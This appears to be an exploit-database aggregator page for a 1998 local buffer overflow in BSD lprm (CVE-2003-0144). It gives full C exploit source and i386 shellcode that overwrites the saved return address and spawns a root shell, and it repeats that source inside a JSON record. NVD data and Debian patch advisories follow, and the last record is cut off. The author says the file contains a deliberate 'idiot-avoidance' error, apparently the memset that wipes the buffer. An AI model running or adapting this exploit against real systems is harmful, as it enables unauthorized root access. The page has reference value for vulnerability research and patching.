Search...

BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 - Local Buffer Overflow Vulnerability 1

1998-04-22T00:00:00

ID EDB-ID:22331
Type exploitdb
Reporter Niall Smart
Modified 1998-04-22T00:00:00

Description

BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 Local Buffer Overflow Vulnerability (1). CVE-2003-0144. Local exploit for unix platform

                                        
                                            source: http://www.securityfocus.com/bid/7025/info

It has been reported that a vulnerability in the handling of some types of requests exists in lprm. When an attacker sends a maliciously crafted string to a configured printer through the lprm command, it may be possible to execute code.

/*
   lprm-bsd.c - Exploit for lprm vulnerability in
                OpenBSD and FreeBSD-stable

   k0ded by Niall Smart, njs3@doc.ic.ac.uk, 1998.

   The original version of this file contains a blatant error
   which anyone who is capable of understanding C will be able
   to locate and remove.  Please do not distribute this file
   without this idiot-avoidance measure.

   Typical egg on FreeBSD: 0xEFBFCFDF
   Typical egg on OpenBSD: 0xEFBFD648

   The exploit might take a while to drop you to a root shell
   depending on the timeout ("tm" capability) specified in the
   printcap file.
*/

#include &lt;sys/types.h&gt;
#include &lt;pwd.h&gt;
#include &lt;err.h&gt;
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;unistd.h&gt;

extern void     BEGIN_SC();
extern void     END_SC();

int
main(int argc, char** argv)
{
        char            buf[4096];
        struct passwd*  pw;
        char*           cgstr;
        char*           cgbuf;
        char*           printer;
        char*           printcaps[] = { "/etc/printcap", 0 };
        int             sc_size;  /* size of shell code */
        int             P;        /* strlen(RP) + strlen(person) */
        unsigned        egg;      /* value to overwrite saved EIP with */

        if (argc != 3) {
                fprintf(stderr, "usage: %s &lt;printername&gt; &lt;egg&gt;\n", argv[0]);
                exit(0);
        }

        if ( (pw = getpwuid(getuid())) == NULL)
                errx(1, "no password entry for your user-id");

        printer = argv[1];
        egg = (unsigned) strtoul(argv[2], NULL, 0);

        if (cgetent(&cgstr, printcaps, printer) &lt; 0)
                errx(1, "can't find printer: %s", printer);

        if (cgetstr(cgstr, "rm", &cgbuf) &lt; 0 || cgbuf[0] == '\0')
                errx(1, "printer is not remote: %s", printer);

        if (cgetstr(cgstr, "rp", &cgbuf) &lt; 0)
                cgbuf = "lp";

        sc_size = (char*) END_SC - (char*) BEGIN_SC;

        /* We can append 1022 bytes to whatever is in the buffer.
           We need to get up to 1032 bytes to reach the saved EIP,
           so there must be at least 10 bytes placed in the buffer
           by the snprintf on line 337 of rmjob.c and the subsequent
           *cp++ = '\0';  3 = ' ' + ' ' + '\5' */

        if ( (P = (strlen(pw-&gt;pw_name) + strlen(cgbuf))) &lt; 7)
                errx(1, "your username is too short");

        fprintf(stderr, "P = %d\n", P);
        fprintf(stderr, "shellcode = %d bytes @ %d\n", sc_size, 1028 - P - 3 - 12 - sc_size);
        fprintf(stderr, "egg = 0x%X@%d\n", egg, 1028 - P - 3);

        /* fill with NOP */
        memset(buf, 0x90, sizeof(buf));
        /* put letter in first byte, this fucker took me eight hours to debug. */
        buf[0] = 'A';
        /* copy in shellcode, we leave 12 bytes for the four pushes before the int 0x80 */
        memcpy(buf + 1028 - P - 3 - 12 - sc_size, (void*) BEGIN_SC, sc_size);
        /* finally, set egg and null terminate */
        *((int*)&buf[1028 - P - 3]) = egg;
        buf[1022] = '\0';

        memset(buf, 0, sizeof(buf));

        execl("/usr/bin/lprm", "lprm", "-P", printer, buf, 0);

        fprintf(stderr, "doh.\n");

        return 0;
}


/*
   shellcode.S - generic i386 shell code

   k0d3d by Niall Smart, njs3@doc.ic.ac.uk, 1998.
   Please send me platform-specific mods.

   Example use:

        #include &lt;stdio.h&gt;
        #include &lt;string.h&gt;

        extern void     BEGIN_SC();
        extern void     END_SC();

        int
        main()
        {
                char    buf[1024];

                memcpy(buf, (void*) BEGIN_SC, (long) END_SC - (long) BEGIN_SC);

                ((void (*)(void)) buf)();

                return 0;
        }

    gcc -Wall main.c shellcode.S -o main && ./main
*/


#if defined(__FreeBSD__) || defined(__OpenBSD__)
#define EXECVE          3B
#define EXIT            01
#define SETUID          17
#define SETEUID         B7
#define KERNCALL        int $0x80
#else
#error This OS not currently supported.
#endif

#define _EXECVE_A       CONCAT($0x555555, EXECVE)
#define _EXECVE_B       CONCAT($0xAAAAAA, EXECVE)
#define _EXIT_A         CONCAT($0x555555, EXIT)
#define _EXIT_B         CONCAT($0xAAAAAA, EXIT)
#define _SETUID_A       CONCAT($0x555555, SETUID)
#define _SETUID_B       CONCAT($0xAAAAAA, SETUID)
#define _SETEUID_A      CONCAT($0x555555, SETEUID)
#define _SETEUID_B      CONCAT($0xAAAAAA, SETEUID)

#define CONCAT(x, y)    CONCAT2(x, y)
#define CONCAT2(x, y)   x ## y

.global         _BEGIN_SC
.global         _END_SC

                .data
_BEGIN_SC:      jmp 0x4                 // jump past next two isns
                movl (%esp), %eax       // copy saved EIP to eax
                ret                     // return to caller
                xorl %ebx, %ebx         // zero ebx
                pushl %ebx              // sete?uid(0)
                pushl %ebx              // dummy, kernel expects extra frame pointer
                movl _SETEUID_A, %eax   //
                andl _SETEUID_B, %eax   // load syscall number
                KERNCALL                // make the call
                movl _SETUID_A, %eax    //
                andl _SETUID_B, %eax    // load syscall number
                KERNCALL                // make the call
                subl $-8, %esp          // push stack back up
                call -40                // call, pushing addr of next isn onto stack
                addl $53, %eax          // make eax point to the string
                movb %bl, 2(%eax)       // append '\0' to "sh"
                movb %bl, 11(%eax)      // append '\0' to "/bin/sh"
                movl %eax, 12(%eax)     // argv[0] = "sh"
                movl %ebx, 16(%eax)     // argv[1] = 0
                pushl %ebx              // push envv
                movl %eax, %ebx         //
                subl $-12, %ebx         // -(-12) = 12, avoid null bytes
                pushl %ebx              // push argv
                subl $-4, %eax          // -(-4) = 4, avoid null bytes
                pushl %eax              // push path
                pushl %eax              // dummy, kernel expects extra frame pointer
                movl _EXECVE_A, %eax    //
                andl _EXECVE_B, %eax    // load syscall number
                KERNCALL                // make the call
                pushl %eax              // push return code from execve
                pushl %eax              //
                movl _EXIT_A, %eax      // we shouldn't have gotten here, try and
                andl _EXIT_B, %eax      // exit with return code from execve
                KERNCALL                // JERONIMO!
                .ascii "shAA/bin/shBCCCCDDDD"
                //      01234567890123456789
_END_SC:

JSON Vulners Source

Initial Source

{"id": "EDB-ID:22331", "hash": "e76031fa883b3115bd9bec2bd097051c", "type": "exploitdb", "bulletinFamily": "exploit", "title": "BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 - Local Buffer Overflow Vulnerability 1", "description": "BSD lpr 2000.05.07/0.48/0.72,lpr-ppd 0.72 Local Buffer Overflow Vulnerability (1). CVE-2003-0144. Local exploit for unix platform", "published": "1998-04-22T00:00:00", "modified": "1998-04-22T00:00:00", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/22331/", "reporter": "Niall Smart", "references": [], "cvelist": ["CVE-2003-0144"], "lastseen": "2016-02-02T18:30:25", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/22331/", "sourceData": "source: http://www.securityfocus.com/bid/7025/info\r\n\r\nIt has been reported that a vulnerability in the handling of some types of requests exists in lprm. When an attacker sends a maliciously crafted string to a configured printer through the lprm command, it may be possible to execute code.\r\n\r\n/*\r\n lprm-bsd.c - Exploit for lprm vulnerability in\r\n OpenBSD and FreeBSD-stable\r\n\r\n k0ded by Niall Smart, njs3@doc.ic.ac.uk, 1998.\r\n\r\n The original version of this file contains a blatant error\r\n which anyone who is capable of understanding C will be able\r\n to locate and remove. Please do not distribute this file\r\n without this idiot-avoidance measure.\r\n\r\n Typical egg on FreeBSD: 0xEFBFCFDF\r\n Typical egg on OpenBSD: 0xEFBFD648\r\n\r\n The exploit might take a while to drop you to a root shell\r\n depending on the timeout (\"tm\" capability) specified in the\r\n printcap file.\r\n*/\r\n\r\n#include <sys/types.h>\r\n#include <pwd.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\nextern void BEGIN_SC();\r\nextern void END_SC();\r\n\r\nint\r\nmain(int argc, char** argv)\r\n{\r\n char buf[4096];\r\n struct passwd* pw;\r\n char* cgstr;\r\n char* cgbuf;\r\n char* printer;\r\n char* printcaps[] = { \"/etc/printcap\", 0 };\r\n int sc_size; /* size of shell code */\r\n int P; /* strlen(RP) + strlen(person) */\r\n unsigned egg; /* value to overwrite saved EIP with */\r\n\r\n if (argc != 3) {\r\n fprintf(stderr, \"usage: %s <printername> <egg>\\n\", argv[0]);\r\n exit(0);\r\n }\r\n\r\n if ( (pw = getpwuid(getuid())) == NULL)\r\n errx(1, \"no password entry for your user-id\");\r\n\r\n printer = argv[1];\r\n egg = (unsigned) strtoul(argv[2], NULL, 0);\r\n\r\n if (cgetent(&cgstr, printcaps, printer) < 0)\r\n errx(1, \"can't find printer: %s\", printer);\r\n\r\n if (cgetstr(cgstr, \"rm\", &cgbuf) < 0 || cgbuf[0] == '\\0')\r\n errx(1, \"printer is not remote: %s\", printer);\r\n\r\n if (cgetstr(cgstr, \"rp\", &cgbuf) < 0)\r\n cgbuf = \"lp\";\r\n\r\n sc_size = (char*) END_SC - (char*) BEGIN_SC;\r\n\r\n /* We can append 1022 bytes to whatever is in the buffer.\r\n We need to get up to 1032 bytes to reach the saved EIP,\r\n so there must be at least 10 bytes placed in the buffer\r\n by the snprintf on line 337 of rmjob.c and the subsequent\r\n *cp++ = '\\0'; 3 = ' ' + ' ' + '\\5' */\r\n\r\n if ( (P = (strlen(pw->pw_name) + strlen(cgbuf))) < 7)\r\n errx(1, \"your username is too short\");\r\n\r\n fprintf(stderr, \"P = %d\\n\", P);\r\n fprintf(stderr, \"shellcode = %d bytes @ %d\\n\", sc_size, 1028 - P - 3 - 12 - sc_size);\r\n fprintf(stderr, \"egg = 0x%X@%d\\n\", egg, 1028 - P - 3);\r\n\r\n /* fill with NOP */\r\n memset(buf, 0x90, sizeof(buf));\r\n /* put letter in first byte, this fucker took me eight hours to debug. */\r\n buf[0] = 'A';\r\n /* copy in shellcode, we leave 12 bytes for the four pushes before the int 0x80 */\r\n memcpy(buf + 1028 - P - 3 - 12 - sc_size, (void*) BEGIN_SC, sc_size);\r\n /* finally, set egg and null terminate */\r\n *((int*)&buf[1028 - P - 3]) = egg;\r\n buf[1022] = '\\0';\r\n\r\n memset(buf, 0, sizeof(buf));\r\n\r\n execl(\"/usr/bin/lprm\", \"lprm\", \"-P\", printer, buf, 0);\r\n\r\n fprintf(stderr, \"doh.\\n\");\r\n\r\n return 0;\r\n}\r\n\r\n\r\n/*\r\n shellcode.S - generic i386 shell code\r\n\r\n k0d3d by Niall Smart, njs3@doc.ic.ac.uk, 1998.\r\n Please send me platform-specific mods.\r\n\r\n Example use:\r\n\r\n #include <stdio.h>\r\n #include <string.h>\r\n\r\n extern void BEGIN_SC();\r\n extern void END_SC();\r\n\r\n int\r\n main()\r\n {\r\n char buf[1024];\r\n\r\n memcpy(buf, (void*) BEGIN_SC, (long) END_SC - (long) BEGIN_SC);\r\n\r\n ((void (*)(void)) buf)();\r\n\r\n return 0;\r\n }\r\n\r\n gcc -Wall main.c shellcode.S -o main && ./main\r\n*/\r\n\r\n\r\n#if defined(__FreeBSD__) || defined(__OpenBSD__)\r\n#define EXECVE 3B\r\n#define EXIT 01\r\n#define SETUID 17\r\n#define SETEUID B7\r\n#define KERNCALL int $0x80\r\n#else\r\n#error This OS not currently supported.\r\n#endif\r\n\r\n#define _EXECVE_A CONCAT($0x555555, EXECVE)\r\n#define _EXECVE_B CONCAT($0xAAAAAA, EXECVE)\r\n#define _EXIT_A CONCAT($0x555555, EXIT)\r\n#define _EXIT_B CONCAT($0xAAAAAA, EXIT)\r\n#define _SETUID_A CONCAT($0x555555, SETUID)\r\n#define _SETUID_B CONCAT($0xAAAAAA, SETUID)\r\n#define _SETEUID_A CONCAT($0x555555, SETEUID)\r\n#define _SETEUID_B CONCAT($0xAAAAAA, SETEUID)\r\n\r\n#define CONCAT(x, y) CONCAT2(x, y)\r\n#define CONCAT2(x, y) x ## y\r\n\r\n.global _BEGIN_SC\r\n.global _END_SC\r\n\r\n .data\r\n_BEGIN_SC: jmp 0x4 // jump past next two isns\r\n movl (%esp), %eax // copy saved EIP to eax\r\n ret // return to caller\r\n xorl %ebx, %ebx // zero ebx\r\n pushl %ebx // sete?uid(0)\r\n pushl %ebx // dummy, kernel expects extra frame pointer\r\n movl _SETEUID_A, %eax //\r\n andl _SETEUID_B, %eax // load syscall number\r\n KERNCALL // make the call\r\n movl _SETUID_A, %eax //\r\n andl _SETUID_B, %eax // load syscall number\r\n KERNCALL // make the call\r\n subl $-8, %esp // push stack back up\r\n call -40 // call, pushing addr of next isn onto stack\r\n addl $53, %eax // make eax point to the string\r\n movb %bl, 2(%eax) // append '\\0' to \"sh\"\r\n movb %bl, 11(%eax) // append '\\0' to \"/bin/sh\"\r\n movl %eax, 12(%eax) // argv[0] = \"sh\"\r\n movl %ebx, 16(%eax) // argv[1] = 0\r\n pushl %ebx // push envv\r\n movl %eax, %ebx //\r\n subl $-12, %ebx // -(-12) = 12, avoid null bytes\r\n pushl %ebx // push argv\r\n subl $-4, %eax // -(-4) = 4, avoid null bytes\r\n pushl %eax // push path\r\n pushl %eax // dummy, kernel expects extra frame pointer\r\n movl _EXECVE_A, %eax //\r\n andl _EXECVE_B, %eax // load syscall number\r\n KERNCALL // make the call\r\n pushl %eax // push return code from execve\r\n pushl %eax //\r\n movl _EXIT_A, %eax // we shouldn't have gotten here, try and\r\n andl _EXIT_B, %eax // exit with return code from execve\r\n KERNCALL // JERONIMO!\r\n .ascii \"shAA/bin/shBCCCCDDDD\"\r\n // 01234567890123456789\r\n_END_SC:", "osvdbidlist": ["7549"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2017-07-11T11:14:15", "references": ["http://www.debian.org/security/2003/dsa-267", "http://marc.info/?l=bugtraq&m=104714441925019&w=2", "ftp://patches.sgi.com/support/free/security/advisories/20030406-02-P", "https://exchange.xforce.ibmcloud.com/vulnerabilities/11473", "http://www.securityfocus.com/bid/7025", "http://www.mandriva.com/security/advisories?name=MDKSA-2003:059", "http://marc.info/?l=bugtraq&m=104690434504429&w=2", "http://www.debian.org/security/2003/dsa-275", "ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.2/common/010_lprm.patch", "http://www.novell.com/linux/security/advisories/2003_014_lprold.html"], "description": "Buffer overflow in the lprm command in the lprold lpr package on SuSE 7.1 through 7.3, OpenBSD 3.2 and earlier, and possibly other operating systems, allows local users to gain root privileges via long command line arguments such as (1) request ID or (2) user name.", "edition": 3, "reporter": "NVD", "published": "2003-03-31T00:00:00", "title": "CVE-2003-0144", "type": "cve", "enchantments": {"score": {"modified": "2017-07-11T11:14:15", "vector": "NONE", "value": 7.2}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2003-0144"], "scanner": [], "modified": "2017-07-10T21:29:27", "cpe": ["cpe:/o:openbsd:openbsd:2.4", "cpe:/a:lprold:lprold:3.0.48", "cpe:/o:openbsd:openbsd:3.1", "cpe:/o:openbsd:openbsd:2.9", "cpe:/o:openbsd:openbsd:2.6", "cpe:/o:openbsd:openbsd:2.2", "cpe:/o:openbsd:openbsd:2.8", "cpe:/o:freebsd:freebsd:2.2", "cpe:/o:openbsd:openbsd:3.0", "cpe:/o:freebsd:freebsd:2.2.3", "cpe:/o:openbsd:openbsd:2.1", "cpe:/o:freebsd:freebsd:2.2.5", "cpe:/o:freebsd:freebsd:2.2.2", "cpe:/o:bsd:lpr:0.48", "cpe:/o:openbsd:openbsd:2.0", "cpe:/o:bsd:lpr:2000-05-07", "cpe:/o:freebsd:freebsd:2.2.4", "cpe:/o:openbsd:openbsd:2.3", "cpe:/o:freebsd:freebsd:2.2.6", "cpe:/o:openbsd:openbsd:2.7", "cpe:/o:openbsd:openbsd:2.5", "cpe:/o:openbsd:openbsd:3.2"], "id": "CVE-2003-0144", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0144", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:14:44", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "3", "packageVersion": "2000.05.07-4.3", "arch": "all", "packageFilename": "lpr_2000.05.07-4.3_all.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian", "OSVersion": "2.2", "packageVersion": "0.48-1.1", "arch": "all", "packageFilename": "lpr_0.48-1.1_all.deb", "packageName": "lpr", "operator": "lt"}], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 267-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nMarch 24th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : lpr\nVulnerability : buffer overflow\nProblem-Type : local\nDebian-specific: no\nCVE Id : CAN-2003-0144\n\nA buffer overflow has been discovered in lpr, a BSD lpr/lpd line\nprinter spooling system. This problem can be exploited by a local\nuser to gain root privileges, even if the printer system is set up\nproperly.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2000.05.07-4.3.\n\nFor the old stable distribution (potato) this problem has been fixed\nin version 0.48-1.1.\n\nFor the stable distribution (sid) this problem has been fixed in\nversion 2000.05.07-4.20.\n\nWe recommend that you upgrade your lpr package immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 2.2 alias potato\n- ---------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48-1.1.dsc\n Size/MD5 checksum: 533 2eb50aa0c9f2292f2977d0029bd3fdd3\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48-1.1.diff.gz\n Size/MD5 checksum: 8800 709256e0ad0a7f664aba6e0c2ddaf231\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48.orig.tar.gz\n Size/MD5 checksum: 75943 7b67555568e1c2d03aedbe66098a52a5\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48-1.1_alpha.deb\n Size/MD5 checksum: 112682 1ea3231bfa2024cb1d7d9fd8c94aa091\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48-1.1_arm.deb\n Size/MD5 checksum: 89128 d185b06412be87a1966ac25cda23dea1\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48-1.1_i386.deb\n Size/MD5 checksum: 85960 1758a9683ae487c20f46a73ba32d9c15\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48-1.1_m68k.deb\n Size/MD5 checksum: 81900 f64919ec85dd3bdc27d6f7de192fafc5\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48-1.1_powerpc.deb\n Size/MD5 checksum: 91200 3b790c8221b61cf7aaff0bcb90fe00de\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48-1.1_sparc.deb\n Size/MD5 checksum: 97776 954f64d74744f3c37fecbb4a78ffbe14\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_2000.05.07-4.3.dsc\n Size/MD5 checksum: 559 8daab94fdff4f6e286224956eaecf054\n http://security.debian.org/pool/updates/main/l/lpr/lpr_2000.05.07-4.3.diff.gz\n Size/MD5 checksum: 24745 8e7a035f2392a1e4a43ab3eef20a596d\n http://security.debian.org/pool/updates/main/l/lpr/lpr_2000.05.07.orig.tar.gz\n Size/MD5 checksum: 71600 d0e726f0fea4324c9b63db50bbfd778e\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_2000.05.07-4.3_alpha.deb\n Size/MD5 checksum: 129660 94f6b0b445c3b89ce76f2e2d3fa54c6e\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_2000.05.07-4.3_arm.deb\n Size/MD5 checksum: 95384 31e43ac786a3731b7d19eee00b757adc\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_2000.05.07-4.3_i386.deb\n Size/MD5 checksum: 93136 4d81cb964fb6bdcf732bbedcbf06ce45\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_2000.05.07-4.3_ia64.deb\n Size/MD5 checksum: 158734 a58ce7dd66d423dbf26e3eb9e16dd5d4\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_2000.05.07-4.3_hppa.deb\n Size/MD5 checksum: 108290 1cabcb262997bdc0bea262b9a54c1392\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_2000.05.07-4.3_m68k.deb\n Size/MD5 checksum: 90322 aacd62143f4736ed6ac5d80f0399bb1c\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_2000.05.07-4.3_mips.deb\n Size/MD5 checksum: 111904 2af9c7b4e0754ebf7e175e59a2a20574\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_2000.05.07-4.3_mipsel.deb\n Size/MD5 checksum: 111708 7fb650fb9c86835f68b774054f80434f\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_2000.05.07-4.3_powerpc.deb\n Size/MD5 checksum: 97256 a0a12802e5ec7a021f2d9cb932ca7191\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_2000.05.07-4.3_s390.deb\n Size/MD5 checksum: 97214 08606777eeb7d98a11835030fe2298a6\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_2000.05.07-4.3_sparc.deb\n Size/MD5 checksum: 122218 2f870ec489eacb68628d9522a68ceb77\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 1, "reporter": "Debian", "published": "2003-03-24T00:00:00", "title": "[SECURITY] [DSA 267-1] New lpr packages fix local root exploit", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:44", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2003-0144"], "modified": "2003-03-24T00:00:00", "id": "DEBIAN:DSA-267-1:3759F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00050.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:15:01", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "3", "packageVersion": "2000.05.07-4.3", "arch": "all", "packageFilename": "lpr_2000.05.07-4.3_all.deb", "packageName": "lpr", "operator": "lt"}, {"OS": "Debian", "OSVersion": "2.2", "packageVersion": "0.48-1.2", "arch": "all", "packageFilename": "lpr_0.48-1.2_all.deb", "packageName": "lpr", "operator": "lt"}], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 267-2 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 15th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : lpr\nVulnerability : buffer overflow\nProblem-Type : local\nDebian-specific: no\nCVE Id : CAN-2003-0144\n\nThe correction for CAN-2003-0144 for the old stable distribution\n(potato) was a little bit too strict apparently and this update\ncorrects this. For completeness here is the advisory text:\n\n A buffer overflow has been discovered in lpr, a BSD lpr/lpd line\n printer spooling system. This problem can be exploited by a local\n user to gain root privileges, even if the printer system is set up\n properly.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2000.05.07-4.3.\n\nFor the old stable distribution (potato) this problem has been fixed\nin version 0.48-1.2.\n\nFor the stable distribution (sid) this problem has been fixed in\nversion 2000.05.07-4.20.\n\nWe recommend that you upgrade your lpr package immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 2.2 alias potato\n- ---------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48-1.2.dsc\n Size/MD5 checksum: 533 f66736520a00e74d609a421afdc08100\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48-1.2.diff.gz\n Size/MD5 checksum: 8949 18e106588274936d15c89e42ad518fb3\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48.orig.tar.gz\n Size/MD5 checksum: 75943 7b67555568e1c2d03aedbe66098a52a5\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48-1.2_alpha.deb\n Size/MD5 checksum: 112834 0cece83c9dfe9faf9bb1f6453822c7bd\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48-1.2_arm.deb\n Size/MD5 checksum: 89230 d403908d35e4d7ce9642183b11fa4457\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48-1.2_i386.deb\n Size/MD5 checksum: 86036 7c2d6c093621b62e8ed7b2fde9bc3296\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48-1.2_m68k.deb\n Size/MD5 checksum: 81994 f884f37a9056b3ab0967ac027a3563a5\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48-1.2_powerpc.deb\n Size/MD5 checksum: 91248 f75d16b597c2e1cd908f5d20afd3f16a\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/l/lpr/lpr_0.48-1.2_sparc.deb\n Size/MD5 checksum: 97840 64fc8bdbdc927ae7df58e0aadd0a8f74\n\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 1, "reporter": "Debian", "published": "2003-04-15T00:00:00", "title": "[SECURITY] [DSA 267-2] New lpr packages fix local root exploit (potato)", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:15:01", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2003-0144"], "modified": "2003-04-15T00:00:00", "id": "DEBIAN:DSA-267-2:EF6E7", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00075.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-16T22:14:07", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "3", "packageVersion": "0.72-2.1", "arch": "all", "packageFilename": "lpr-ppd_0.72-2.1_all.deb", "packageName": "lpr-ppd", "operator": "lt"}], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 275-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 2nd, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : lpr-ppd\nVulnerability : buffer overflow\nProblem-Type : local\nDebian-specific: no\nCVE Id : CAN-2003-0144\n\nA buffer overflow has been discovered in lpr, a BSD lpr/lpd line\nprinter spooling system. This problem can be exploited by a local\nuser to gain root privileges, even if the printer system is set up\nproperly.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 0.72-2.1.\n\nThe old stable distribution (potato) does not contain lpr-ppd packages.\n\nFor the stable distribution (sid) this problem has been fixed in\nversion 0.72-3.\n\nWe recommend that you upgrade your lpr-ppd package immediately.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/l/lpr-ppd/lpr-ppd_0.72-2.1.dsc\n Size/MD5 checksum: 553 a746445ec594d718a1f16f1bad63b1b9\n http://security.debian.org/pool/updates/main/l/lpr-ppd/lpr-ppd_0.72-2.1.diff.gz\n Size/MD5 checksum: 7933 